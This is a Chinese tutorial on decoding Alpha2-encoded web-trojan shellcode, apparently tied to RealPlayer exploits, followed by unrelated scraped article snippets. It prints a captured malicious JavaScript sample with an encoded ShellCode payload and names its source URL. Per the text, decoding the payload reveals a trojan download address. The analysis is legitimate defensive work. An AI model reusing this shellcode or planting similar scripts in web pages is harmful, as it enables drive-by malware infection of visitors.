当前位置:首页 >> 建筑/土木 >>

网马解密中级篇(Alpha2篇)


网马解密中级篇(Alpha2篇).txt恨一个人和爱一个人的区别是:一个放在嘴边,一个藏在心里。人生三愿:一是吃得下饭,二是睡得着觉,三是笑得出来。网马解密大讲堂——网马解密中级篇(Alpha2篇)
作者: networkedition

Alpha2是Realplay漏洞多采用此加密方式,该加密方式特征:

代码开头:TYIIIIIIIIIIIIIIII;

一般情况下在网马解密过程中,在获取的恶意网址源代码中,代码开头有上述类似代码,使用得加密方式即为alpha2。

下面我们将结合实例讲解alpha2解密方法,我们先来看一个典型的alpha2加密的网马代码:
复制内容到剪贴板代码:

var arr1=["c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\chimes.wav","c:\\Program Files\\NetMeeting\\testSnd.wav","C:\\WINDOWS\\system32\\BuzzingBee.wav","C:\\WINDOWS\\clock.avi","c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\tada.wav","C:\\WINDOWS\\system32\\LoopyMusic.wav"];
ShellCode="";
ShellCode=ShellCode+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI";
ShellCode=ShellCode+"xkR0qJPJP3YY0fNYwLEQk0p47zpf"+"KRKJJKVe9xJKYoIoYolOoCQv";
ShellCode=ShellCode+"3VsVwLuRKwRva"+"vbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEB";
ShellCode=ShellCode+"sHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGO";
ShellCode=ShellCode+"NuKpTRr"+"NWOVYM5m"+"qqrwSMTn"+"oeoty08JM"+"nKJMgPw2p"+"ey5MgMWQuMw";
ShellCode=ShellCode+"runOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCX";
ShellCode=ShellCode+"HmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQK";
ShellCode=ShellCode+"e6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI";
ShellCode=ShellCode+"5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQ";
ShellCode=ShellCode+"OjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWL";
ShellCode=ShellCode+"gOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5";
ShellCode=ShellCode+"PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcEN";
ShellCode=ShellCode+"eStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw";
ShellCode=ShellCode+"2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwW";
ShellCode=ShellCode+"qvRHptd4RPFZVOdoSXQqrORXQy0a6QP86NPcbOpmTo1hsYu14oPfFUTnU3PspsOpgp"; 我们将上述代码,复制粘贴至freshow的上操作区域,相见下列截图:



http://www.baidu163sinasohu.cn/sina/real.js这个恶意网址源代码内容为上述代码,由于恶意网址的时效性,这个恶意网址已经失效,我将此js脚本源代码已保存,直接使用源代码来讲解,并不影响我们的讲解。

接下来我们要将此代码处理一下,去掉没有用的部分。相见下列截图:



大的红色框里内容为处理后源代码,实际就是将shellcode部分保留,删除其余无效代码内容。

接下来我们选择解密选项为alpha2,点击decode进行一次解密,解密后内容会显示在下操作区域,点击up按钮将下操作区域代码上翻至上操作区域,进行二次解密,解密选项选择esc,点击decode进行二次解密,获得网马下载地址,请见下列截图:

赞助商链接
相关文章:
png图片详解与加密解密方法
png图片详解与加密解密方法_计算机软件及应用_IT/...因为一个索引值的最大 上限为 2 的 8 次方既 ...不过该格式最大的优点是可以保存 Alpha 通道,同 事...
二年级阅读训练50篇
1、 这篇短文有___句话。 短文写出了小花猫___时候___的样子。 2、 短文...紧挨着枣红马旁边是一匹白马,从 头到尾一片洁白。连一根杂毛也没有,像一团...
交换生学习的心得体会范文3篇
其实 德国情况和荷兰类似,生活很乏味,德国人有的是 stereotype 和"alpha male"...6、德国的洗手间里多数马桶上没有水箱的,水箱是做在墙里的,这个就意味着马 ...
AlphaGo原理
无法被人工智能攻克的防线,然而转眼就变成了马其诺...摘自 AlphaGo 论文的图 3 清晰展示了策略网 络和...其 预测精度只有 24.2%但是预测耗时仅为 2 微秒,...
二十世纪战争解密
十世纪战争解密 1 十世纪战争解密之八国联军入侵中国 2 十世纪战争解密之日俄战争 3 二十世纪战争解密之萨拉热窝导火线 4 二十世纪战争解密之马恩河大...
大学语文(本)第二次作业三
正确答案:A 题号:5 内容: 曹植《白马篇》:“捐躯赴国难,视死忽如归。”...1、 错 2、 对 正确答案:2 题号:34 内容: 使君从南来,五马立踟蹰。(《...
李涛PS教程(提高篇)整理后笔记
李涛PS教程(提高篇)整理后笔记_其它语言学习_外语学习_教育专区。一、画笔 1....2.复 制通道,是为了转成选区即 alpha 通道。3.调节色阶,是为了让黑白或灰度...
人教版小学阅读理解练习100篇全集
“唉! ”骑马的人叹了口气,说: “我怕马吃不消,所 以把包袱顶在头上,这样做可以让马省些力气呀! ” 1.这篇短文共有___ 个自然段。 2.用“——”划...
加密解密算法应用及研究
XIX 加密解密算法应用及研究(作者:马蝶) 摘要:随着 21 世纪的到来,网络的应用越来越广泛,计算机信息的保密问题显得越 来越重要,无论是个人信息通信还是电子商务...
安德义论语解读——为政篇第二(以德为政)
(父母),那么 养狗和养马,也是养,如果不对父母献上敬爱之心,那同饲养牲畜有...1/2 相关文档推荐 为政篇第二 23页 免费 论语为政篇第二 16页 免费 安德...
更多相关标签: